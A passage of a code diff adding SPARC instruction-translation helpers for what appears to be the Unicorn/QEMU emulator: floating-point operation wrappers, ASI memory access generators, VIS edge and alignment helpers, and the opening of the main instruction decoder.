TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst, src; + + src = gen_load_fpr_D(dc, rs); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); + + gen_store_fpr_D(dc, rd, dst); +} + +#ifdef TARGET_SPARC64 +static inline void gen_ne_fop_DD(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst, src; + + src = gen_load_fpr_D(dc, rs); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, src); + + gen_store_fpr_D(dc, rd, dst); +} +#endif + +static inline void gen_fop_DDD(DisasContext *dc, int rd, int rs1, int rs2, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_ptr, TCGv_i64, TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst, src1, src2; + + src1 = gen_load_fpr_D(dc, rs1); + src2 = gen_load_fpr_D(dc, rs2); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env, src1, src2); + + gen_store_fpr_D(dc, rd, dst); +} + +#ifdef TARGET_SPARC64 +static inline void gen_ne_fop_DDD(DisasContext *dc, int rd, int rs1, int rs2, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64, TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst, src1, src2; + + src1 = gen_load_fpr_D(dc, rs1); + src2 = gen_load_fpr_D(dc, rs2); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, src1, src2); + + gen_store_fpr_D(dc, rd, dst); +} + +static inline void gen_gsr_fop_DDD(DisasContext *dc, int rd, int rs1, int rs2, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64, TCGv_i64, TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst, src1, src2; + + src1 = gen_load_fpr_D(dc, rs1); + src2 = gen_load_fpr_D(dc, rs2); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, *(TCGv *)tcg_ctx->cpu_gsr, src1, src2); + + gen_store_fpr_D(dc, rd, dst); +} + +static inline void gen_ne_fop_DDDD(DisasContext *dc, int rd, int rs1, int rs2, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64, TCGv_i64, TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst, src0, src1, src2; + + src1 = gen_load_fpr_D(dc, rs1); + src2 = gen_load_fpr_D(dc, rs2); + src0 = gen_load_fpr_D(dc, rd); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, src0, src1, src2); + + gen_store_fpr_D(dc, rd, dst); +} +#endif + +static inline void gen_fop_QQ(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_ptr)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_op_load_fpr_QT1(dc, QFPREG(rs)); + + gen(tcg_ctx, tcg_ctx->cpu_env); + + gen_op_store_QT0_fpr(dc, QFPREG(rd)); + gen_update_fprs_dirty(dc, QFPREG(rd)); +} + +#ifdef TARGET_SPARC64 +static inline void gen_ne_fop_QQ(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_ptr)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_op_load_fpr_QT1(dc, QFPREG(rs)); + + gen(tcg_ctx, tcg_ctx->cpu_env); + + gen_op_store_QT0_fpr(dc, QFPREG(rd)); + gen_update_fprs_dirty(dc, QFPREG(rd)); +} +#endif + +static inline void gen_fop_QQQ(DisasContext *dc, int rd, int rs1, int rs2, + void (*gen)(TCGContext *tcg_ctx, TCGv_ptr)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_op_load_fpr_QT0(dc, QFPREG(rs1)); + gen_op_load_fpr_QT1(dc, QFPREG(rs2)); + + gen(tcg_ctx, tcg_ctx->cpu_env); + + gen_op_store_QT0_fpr(dc, QFPREG(rd)); + gen_update_fprs_dirty(dc, QFPREG(rd)); +} + +static inline void gen_fop_DFF(DisasContext *dc, int rd, int rs1, int rs2, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_ptr, TCGv_i32, TCGv_i32)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst; + TCGv_i32 src1, src2; + + src1 = gen_load_fpr_F(dc, rs1); + src2 = gen_load_fpr_F(dc, rs2); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env, src1, src2); + + gen_store_fpr_D(dc, rd, dst); +} + +static inline void gen_fop_QDD(DisasContext *dc, int rd, int rs1, int rs2, + void (*gen)(TCGContext *tcg_ctx, TCGv_ptr, TCGv_i64, TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 src1, src2; + + src1 = gen_load_fpr_D(dc, rs1); + src2 = gen_load_fpr_D(dc, rs2); + + gen(tcg_ctx, tcg_ctx->cpu_env, src1, src2); + + gen_op_store_QT0_fpr(dc, QFPREG(rd)); + gen_update_fprs_dirty(dc, QFPREG(rd)); +} + +#ifdef TARGET_SPARC64 +static inline void gen_fop_DF(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_ptr, TCGv_i32)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst; + TCGv_i32 src; + + src = gen_load_fpr_F(dc, rs); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); + + gen_store_fpr_D(dc, rd, dst); +} +#endif + +static inline void gen_ne_fop_DF(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_ptr, TCGv_i32)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst; + TCGv_i32 src; + + src = gen_load_fpr_F(dc, rs); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); + + gen_store_fpr_D(dc, rd, dst); +} + +static inline void gen_fop_FD(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i32, TCGv_ptr, TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 dst; + TCGv_i64 src; + + src = gen_load_fpr_D(dc, rs); + dst = gen_dest_fpr_F(dc); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); + + gen_store_fpr_F(dc, rd, dst); +} + +static inline void gen_fop_FQ(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i32, TCGv_ptr)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 dst; + + gen_op_load_fpr_QT1(dc, QFPREG(rs)); + dst = gen_dest_fpr_F(dc); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env); + + gen_store_fpr_F(dc, rd, dst); +} + +static inline void gen_fop_DQ(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_ptr)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst; + + gen_op_load_fpr_QT1(dc, QFPREG(rs)); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env); + + gen_store_fpr_D(dc, rd, dst); +} + +static inline void gen_ne_fop_QF(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_ptr, TCGv_i32)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 src; + + src = gen_load_fpr_F(dc, rs); + + gen(tcg_ctx, tcg_ctx->cpu_env, src); + + gen_op_store_QT0_fpr(dc, QFPREG(rd)); + gen_update_fprs_dirty(dc, QFPREG(rd)); +} + +static inline void gen_ne_fop_QD(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_ptr, TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 src; + + src = gen_load_fpr_D(dc, rs); + + gen(tcg_ctx, tcg_ctx->cpu_env, src); + + gen_op_store_QT0_fpr(dc, QFPREG(rd)); + gen_update_fprs_dirty(dc, QFPREG(rd)); +} + +/* asi moves */ +#ifdef TARGET_SPARC64 +static inline TCGv_i32 gen_get_asi(DisasContext *dc, int insn, TCGv r_addr) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + int asi; + TCGv_i32 r_asi; + + if (IS_IMM) { + r_asi = tcg_temp_new_i32(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, r_asi, tcg_ctx->cpu_asi); + } else { + asi = GET_FIELD(insn, 19, 26); + r_asi = tcg_const_i32(tcg_ctx, asi); + } + return r_asi; +} + +static inline void gen_ld_asi(DisasContext *dc, TCGv dst, TCGv addr, int insn, int size, + int sign) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_asi, r_size, r_sign; + + r_asi = gen_get_asi(dc, insn, addr); + r_size = tcg_const_i32(tcg_ctx, size); + r_sign = tcg_const_i32(tcg_ctx, sign); + gen_helper_ld_asi(tcg_ctx, dst, tcg_ctx->cpu_env, addr, r_asi, r_size, r_sign); + tcg_temp_free_i32(tcg_ctx, r_sign); + tcg_temp_free_i32(tcg_ctx, r_size); + tcg_temp_free_i32(tcg_ctx, r_asi); +} + +static inline void gen_st_asi(DisasContext *dc, TCGv src, TCGv addr, int insn, int size) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_asi, r_size; + + r_asi = gen_get_asi(dc, insn, addr); + r_size = tcg_const_i32(tcg_ctx, size); + gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, src, r_asi, r_size); + tcg_temp_free_i32(tcg_ctx, r_size); + tcg_temp_free_i32(tcg_ctx, r_asi); +} + +static inline void gen_ldf_asi(DisasContext *dc, TCGv addr, int insn, int size, int rd) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_asi, r_size, r_rd; + + r_asi = gen_get_asi(dc, insn, addr); + r_size = tcg_const_i32(tcg_ctx, size); + r_rd = tcg_const_i32(tcg_ctx, rd); + gen_helper_ldf_asi(tcg_ctx, tcg_ctx->cpu_env, addr, r_asi, r_size, r_rd); + tcg_temp_free_i32(tcg_ctx, r_rd); + tcg_temp_free_i32(tcg_ctx, r_size); + tcg_temp_free_i32(tcg_ctx, r_asi); +} + +static inline void gen_stf_asi(DisasContext *dc, TCGv addr, int insn, int size, int rd) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_asi, r_size, r_rd; + + r_asi = gen_get_asi(dc, insn, addr); + r_size = tcg_const_i32(tcg_ctx, size); + r_rd = tcg_const_i32(tcg_ctx, rd); + gen_helper_stf_asi(tcg_ctx, tcg_ctx->cpu_env, addr, r_asi, r_size, r_rd); + tcg_temp_free_i32(tcg_ctx, r_rd); + tcg_temp_free_i32(tcg_ctx, r_size); + tcg_temp_free_i32(tcg_ctx, r_asi); +} + +static inline void gen_swap_asi(DisasContext *dc, TCGv dst, TCGv src, TCGv addr, int insn) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_asi, r_size, r_sign; + TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); + + r_asi = gen_get_asi(dc, insn, addr); + r_size = tcg_const_i32(tcg_ctx, 4); + r_sign = tcg_const_i32(tcg_ctx, 0); + gen_helper_ld_asi(tcg_ctx, t64, tcg_ctx->cpu_env, addr, r_asi, r_size, r_sign); + tcg_temp_free_i32(tcg_ctx, r_sign); + gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, src, r_asi, r_size); + tcg_temp_free_i32(tcg_ctx, r_size); + tcg_temp_free_i32(tcg_ctx, r_asi); + tcg_gen_trunc_i64_tl(tcg_ctx, dst, t64); + tcg_temp_free_i64(tcg_ctx, t64); +} + +static inline void gen_ldda_asi(DisasContext *dc, TCGv hi, TCGv addr, + int insn, int rd) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_asi, r_rd; + + r_asi = gen_get_asi(dc, insn, addr); + r_rd = tcg_const_i32(tcg_ctx, rd); + gen_helper_ldda_asi(tcg_ctx, tcg_ctx->cpu_env, addr, r_asi, r_rd); + tcg_temp_free_i32(tcg_ctx, r_rd); + tcg_temp_free_i32(tcg_ctx, r_asi); +} + +static inline void gen_stda_asi(DisasContext *dc, TCGv hi, TCGv addr, + int insn, int rd) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_asi, r_size; + TCGv lo = gen_load_gpr(dc, rd + 1); + TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_concat_tl_i64(tcg_ctx, t64, lo, hi); + r_asi = gen_get_asi(dc, insn, addr); + r_size = tcg_const_i32(tcg_ctx, 8); + gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, t64, r_asi, r_size); + tcg_temp_free_i32(tcg_ctx, r_size); + tcg_temp_free_i32(tcg_ctx, r_asi); + tcg_temp_free_i64(tcg_ctx, t64); +} + +static inline void gen_casx_asi(DisasContext *dc, TCGv addr, + TCGv val2, int insn, int rd) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv val1 = gen_load_gpr(dc, rd); + TCGv dst = gen_dest_gpr(dc, rd); + TCGv_i32 r_asi = gen_get_asi(dc, insn, addr); + + gen_helper_casx_asi(tcg_ctx, dst, tcg_ctx->cpu_env, addr, val1, val2, r_asi); + tcg_temp_free_i32(tcg_ctx, r_asi); + gen_store_gpr(dc, rd, dst); +} + +#elif !defined(CONFIG_USER_ONLY) + +static inline void gen_ld_asi(DisasContext *dc, TCGv dst, TCGv addr, int insn, int size, + int sign) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_asi, r_size, r_sign; + TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); + + r_asi = tcg_const_i32(tcg_ctx, GET_FIELD(insn, 19, 26)); + r_size = tcg_const_i32(tcg_ctx, size); + r_sign = tcg_const_i32(tcg_ctx, sign); + gen_helper_ld_asi(tcg_ctx, t64, tcg_ctx->cpu_env, addr, r_asi, r_size, r_sign); + tcg_temp_free_i32(tcg_ctx, r_sign); + tcg_temp_free_i32(tcg_ctx, r_size); + tcg_temp_free_i32(tcg_ctx, r_asi); + tcg_gen_trunc_i64_tl(tcg_ctx, dst, t64); + tcg_temp_free_i64(tcg_ctx, t64); +} + +static inline void gen_st_asi(DisasContext *dc, TCGv src, TCGv addr, int insn, int size) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_asi, r_size; + TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_extu_tl_i64(tcg_ctx, t64, src); + r_asi = tcg_const_i32(tcg_ctx, GET_FIELD(insn, 19, 26)); + r_size = tcg_const_i32(tcg_ctx, size); + gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, t64, r_asi, r_size); + tcg_temp_free_i32(tcg_ctx, r_size); + tcg_temp_free_i32(tcg_ctx, r_asi); + tcg_temp_free_i64(tcg_ctx, t64); +} + +static inline void gen_swap_asi(DisasContext *dc, TCGv dst, TCGv src, TCGv addr, int insn) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_asi, r_size, r_sign; + TCGv_i64 r_val, t64; + + r_asi = tcg_const_i32(tcg_ctx, GET_FIELD(insn, 19, 26)); + r_size = tcg_const_i32(tcg_ctx, 4); + r_sign = tcg_const_i32(tcg_ctx, 0); + t64 = tcg_temp_new_i64(tcg_ctx); + gen_helper_ld_asi(tcg_ctx, t64, tcg_ctx->cpu_env, addr, r_asi, r_size, r_sign); + tcg_temp_free(tcg_ctx, r_sign); + r_val = tcg_temp_new_i64(tcg_ctx); + tcg_gen_extu_tl_i64(tcg_ctx, r_val, src); + gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, r_val, r_asi, r_size); + tcg_temp_free_i64(tcg_ctx, r_val); + tcg_temp_free_i32(tcg_ctx, r_size); + tcg_temp_free_i32(tcg_ctx, r_asi); + tcg_gen_trunc_i64_tl(tcg_ctx, dst, t64); + tcg_temp_free_i64(tcg_ctx, t64); +} + +static inline void gen_ldda_asi(DisasContext *dc, TCGv hi, TCGv addr, + int insn, int rd) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_asi, r_size, r_sign; + TCGv t; + TCGv_i64 t64; + + r_asi = tcg_const_i32(tcg_ctx, GET_FIELD(insn, 19, 26)); + r_size = tcg_const_i32(tcg_ctx, 8); + r_sign = tcg_const_i32(tcg_ctx, 0); + t64 = tcg_temp_new_i64(tcg_ctx); + gen_helper_ld_asi(tcg_ctx, t64, tcg_ctx->cpu_env, addr, r_asi, r_size, r_sign); + tcg_temp_free_i32(tcg_ctx, r_sign); + tcg_temp_free_i32(tcg_ctx, r_size); + tcg_temp_free_i32(tcg_ctx, r_asi); + + t = gen_dest_gpr(dc, rd + 1); + tcg_gen_trunc_i64_tl(tcg_ctx, t, t64); + gen_store_gpr(dc, rd + 1, t); + + tcg_gen_shri_i64(tcg_ctx, t64, t64, 32); + tcg_gen_trunc_i64_tl(tcg_ctx, hi, t64); + tcg_temp_free_i64(tcg_ctx, t64); + gen_store_gpr(dc, rd, hi); +} + +static inline void gen_stda_asi(DisasContext *dc, TCGv hi, TCGv addr, + int insn, int rd) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_asi, r_size; + TCGv lo = gen_load_gpr(dc, rd + 1); + TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_concat_tl_i64(tcg_ctx, t64, lo, hi); + r_asi = tcg_const_i32(tcg_ctx, GET_FIELD(insn, 19, 26)); + r_size = tcg_const_i32(tcg_ctx, 8); + gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, t64, r_asi, r_size); + tcg_temp_free_i32(tcg_ctx, r_size); + tcg_temp_free_i32(tcg_ctx, r_asi); + tcg_temp_free_i64(tcg_ctx, t64); +} +#endif + +#if !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64) +static inline void gen_cas_asi(DisasContext *dc, TCGv addr, + TCGv val2, int insn, int rd) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv val1 = gen_load_gpr(dc, rd); + TCGv dst = gen_dest_gpr(dc, rd); +#ifdef TARGET_SPARC64 + TCGv_i32 r_asi = gen_get_asi(dc, insn, addr); +#else + TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, GET_FIELD(insn, 19, 26)); +#endif + + gen_helper_cas_asi(tcg_ctx, dst, tcg_ctx->cpu_env, addr, val1, val2, r_asi); + tcg_temp_free_i32(tcg_ctx, r_asi); + gen_store_gpr(dc, rd, dst); +} + +static inline void gen_ldstub_asi(DisasContext *dc, TCGv dst, TCGv addr, int insn) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 r_val; + TCGv_i32 r_asi, r_size; + + gen_ld_asi(dc, dst, addr, insn, 1, 0); + + r_val = tcg_const_i64(tcg_ctx, 0xffULL); + r_asi = tcg_const_i32(tcg_ctx, GET_FIELD(insn, 19, 26)); + r_size = tcg_const_i32(tcg_ctx, 1); + gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, r_val, r_asi, r_size); + tcg_temp_free_i32(tcg_ctx, r_size); + tcg_temp_free_i32(tcg_ctx, r_asi); + tcg_temp_free_i64(tcg_ctx, r_val); +} +#endif + +static TCGv get_src1(DisasContext *dc, unsigned int insn) +{ + unsigned int rs1 = GET_FIELD(insn, 13, 17); + return gen_load_gpr(dc, rs1); +} + +static TCGv get_src2(DisasContext *dc, unsigned int insn) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + if (IS_IMM) { /* immediate */ + target_long simm = GET_FIELDs(insn, 19, 31); + TCGv t = get_temp_tl(dc); + tcg_gen_movi_tl(tcg_ctx, t, simm); + return t; + } else { /* register */ + unsigned int rs2 = GET_FIELD(insn, 27, 31); + return gen_load_gpr(dc, rs2); + } +} + +#ifdef TARGET_SPARC64 +static void gen_fmovs(DisasContext *dc, DisasCompare *cmp, int rd, int rs) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 c32, zero, dst, s1, s2; + + /* We have two choices here: extend the 32 bit data and use movcond_i64, + or fold the comparison down to 32 bits and use movcond_i32. Choose + the later. */ + c32 = tcg_temp_new_i32(tcg_ctx); + if (cmp->is_bool) { + tcg_gen_trunc_i64_i32(tcg_ctx, c32, cmp->c1); + } else { + TCGv_i64 c64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_setcond_i64(tcg_ctx, cmp->cond, c64, cmp->c1, cmp->c2); + tcg_gen_trunc_i64_i32(tcg_ctx, c32, c64); + tcg_temp_free_i64(tcg_ctx, c64); + } + + s1 = gen_load_fpr_F(dc, rs); + s2 = gen_load_fpr_F(dc, rd); + dst = gen_dest_fpr_F(dc); + zero = tcg_const_i32(tcg_ctx, 0); + + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, dst, c32, zero, s1, s2); + + tcg_temp_free_i32(tcg_ctx, c32); + tcg_temp_free_i32(tcg_ctx, zero); + gen_store_fpr_F(dc, rd, dst); +} + +static void gen_fmovd(DisasContext *dc, DisasCompare *cmp, int rd, int rs) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst = gen_dest_fpr_D(dc, rd); + tcg_gen_movcond_i64(tcg_ctx, cmp->cond, dst, cmp->c1, cmp->c2, + gen_load_fpr_D(dc, rs), + gen_load_fpr_D(dc, rd)); + gen_store_fpr_D(dc, rd, dst); +} + +static void gen_fmovq(DisasContext *dc, DisasCompare *cmp, int rd, int rs) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + int qd = QFPREG(rd); + int qs = QFPREG(rs); + + tcg_gen_movcond_i64(tcg_ctx, cmp->cond, tcg_ctx->cpu_fpr[qd / 2], cmp->c1, cmp->c2, + tcg_ctx->cpu_fpr[qs / 2], tcg_ctx->cpu_fpr[qd / 2]); + tcg_gen_movcond_i64(tcg_ctx, cmp->cond, tcg_ctx->cpu_fpr[qd / 2 + 1], cmp->c1, cmp->c2, + tcg_ctx->cpu_fpr[qs / 2 + 1], tcg_ctx->cpu_fpr[qd / 2 + 1]); + + gen_update_fprs_dirty(dc, qd); +} + +static inline void gen_load_trap_state_at_tl(DisasContext *dc, TCGv_ptr r_tsptr, TCGv_ptr cpu_env) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_tl = tcg_temp_new_i32(tcg_ctx); + + /* load env->tl into r_tl */ + tcg_gen_ld_i32(tcg_ctx, r_tl, cpu_env, offsetof(CPUSPARCState, tl)); + + /* tl = [0 ... MAXTL_MASK] where MAXTL_MASK must be power of 2 */ + tcg_gen_andi_i32(tcg_ctx, r_tl, r_tl, MAXTL_MASK); + + /* calculate offset to current trap state from env->ts, reuse r_tl */ + tcg_gen_muli_i32(tcg_ctx, r_tl, r_tl, sizeof (trap_state)); + tcg_gen_addi_ptr(tcg_ctx, r_tsptr, cpu_env, offsetof(CPUSPARCState, ts)); + + /* tsptr = env->ts[env->tl & MAXTL_MASK] */ + { + TCGv_ptr r_tl_tmp = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_ext_i32_ptr(tcg_ctx, r_tl_tmp, r_tl); + tcg_gen_add_ptr(tcg_ctx, r_tsptr, r_tsptr, r_tl_tmp); + tcg_temp_free_ptr(tcg_ctx, r_tl_tmp); + } + + tcg_temp_free_i32(tcg_ctx, r_tl); +} + +static void gen_edge(DisasContext *dc, TCGv dst, TCGv s1, TCGv s2, + int width, bool cc, bool left) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv lo1, lo2, t1, t2; + uint64_t amask, tabl, tabr; + int shift, imask, omask; + + if (cc) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, s1); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src2, s2); + tcg_gen_sub_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, s1, s2); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_SUB); + dc->cc_op = CC_OP_SUB; + } + + /* Theory of operation: there are two tables, left and right (not to + be confused with the left and right versions of the opcode). These + are indexed by the low 3 bits of the inputs. To make things "easy", + these tables are loaded into two constants, TABL and TABR below. + The operation index = (input & imask) << shift calculates the index + into the constant, while val = (table >> index) & omask calculates + the value we're looking for. */ + switch (width) { + case 8: + imask = 0x7; + shift = 3; + omask = 0xff; + if (left) { + tabl = 0x80c0e0f0f8fcfeffULL; + tabr = 0xff7f3f1f0f070301ULL; + } else { + tabl = 0x0103070f1f3f7fffULL; + tabr = 0xfffefcf8f0e0c080ULL; + } + break; + case 16: + imask = 0x6; + shift = 1; + omask = 0xf; + if (left) { + tabl = 0x8cef; + tabr = 0xf731; + } else { + tabl = 0x137f; + tabr = 0xfec8; + } + break; + case 32: + imask = 0x4; + shift = 0; + omask = 0x3; + if (left) { + tabl = (2 << 2) | 3; + tabr = (3 << 2) | 1; + } else { + tabl = (1 << 2) | 3; + tabr = (3 << 2) | 2; + } + break; + default: + abort(); + } + + lo1 = tcg_temp_new(tcg_ctx); + lo2 = tcg_temp_new(tcg_ctx); + tcg_gen_andi_tl(tcg_ctx, lo1, s1, imask); + tcg_gen_andi_tl(tcg_ctx, lo2, s2, imask); + tcg_gen_shli_tl(tcg_ctx, lo1, lo1, shift); + tcg_gen_shli_tl(tcg_ctx, lo2, lo2, shift); + + t1 = tcg_const_tl(tcg_ctx, tabl); + t2 = tcg_const_tl(tcg_ctx, tabr); + tcg_gen_shr_tl(tcg_ctx, lo1, t1, lo1); + tcg_gen_shr_tl(tcg_ctx, lo2, t2, lo2); + tcg_gen_andi_tl(tcg_ctx, dst, lo1, omask); + tcg_gen_andi_tl(tcg_ctx, lo2, lo2, omask); + + amask = -8; + if (AM_CHECK(dc)) { + amask &= 0xffffffffULL; + } + tcg_gen_andi_tl(tcg_ctx, s1, s1, amask); + tcg_gen_andi_tl(tcg_ctx, s2, s2, amask); + + /* We want to compute + dst = (s1 == s2 ? lo1 : lo1 & lo2). + We've already done dst = lo1, so this reduces to + dst &= (s1 == s2 ? -1 : lo2) + Which we perform by + lo2 |= -(s1 == s2) + dst &= lo2 + */ + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, t1, s1, s2); + tcg_gen_neg_tl(tcg_ctx, t1, t1); + tcg_gen_or_tl(tcg_ctx, lo2, lo2, t1); + tcg_gen_and_tl(tcg_ctx, dst, dst, lo2); + + tcg_temp_free(tcg_ctx, lo1); + tcg_temp_free(tcg_ctx, lo2); + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, t2); +} + +static void gen_alignaddr(DisasContext *dc, TCGv dst, TCGv s1, TCGv s2, bool left) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv tmp = tcg_temp_new(tcg_ctx); + + tcg_gen_add_tl(tcg_ctx, tmp, s1, s2); + tcg_gen_andi_tl(tcg_ctx, dst, tmp, -8); + if (left) { + tcg_gen_neg_tl(tcg_ctx, tmp, tmp); + } + tcg_gen_deposit_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_gsr, *(TCGv *)tcg_ctx->cpu_gsr, tmp, 0, 3); + + tcg_temp_free(tcg_ctx, tmp); +} + +static void gen_faligndata(TCGContext *tcg_ctx, TCGv dst, TCGv gsr, TCGv s1, TCGv s2) +{ + TCGv t1, t2, shift; + + t1 = tcg_temp_new(tcg_ctx); + t2 = tcg_temp_new(tcg_ctx); + shift = tcg_temp_new(tcg_ctx); + + tcg_gen_andi_tl(tcg_ctx, shift, gsr, 7); + tcg_gen_shli_tl(tcg_ctx, shift, shift, 3); + tcg_gen_shl_tl(tcg_ctx, t1, s1, shift); + + /* A shift of 64 does not produce 0 in TCG. Divide this into a + shift of (up to 63) followed by a constant shift of 1. */ + tcg_gen_xori_tl(tcg_ctx, shift, shift, 63); + tcg_gen_shr_tl(tcg_ctx, t2, s2, shift); + tcg_gen_shri_tl(tcg_ctx, t2, t2, 1); + + tcg_gen_or_tl(tcg_ctx, dst, t1, t2); + + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, t2); + tcg_temp_free(tcg_ctx, shift); +} +#endif + +#define CHECK_IU_FEATURE(dc, FEATURE) \ + if (!((dc)->def->features & CPU_FEATURE_ ## FEATURE)) \ + goto illegal_insn; +#define CHECK_FPU_FEATURE(dc, FEATURE) \ + if (!((dc)->def->features & CPU_FEATURE_ ## FEATURE)) \ + goto nfpu_insn; + +/* before an instruction, dc->pc must be static */ +static void disas_sparc_insn(DisasContext * dc, unsigned int insn, bool hook_insn) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + unsigned int opc, rs1, rs2, rd; + TCGv cpu_src1, cpu_src2; + TCGv_i32 cpu_src1_32, cpu_src2_32, cpu_dst_32; + 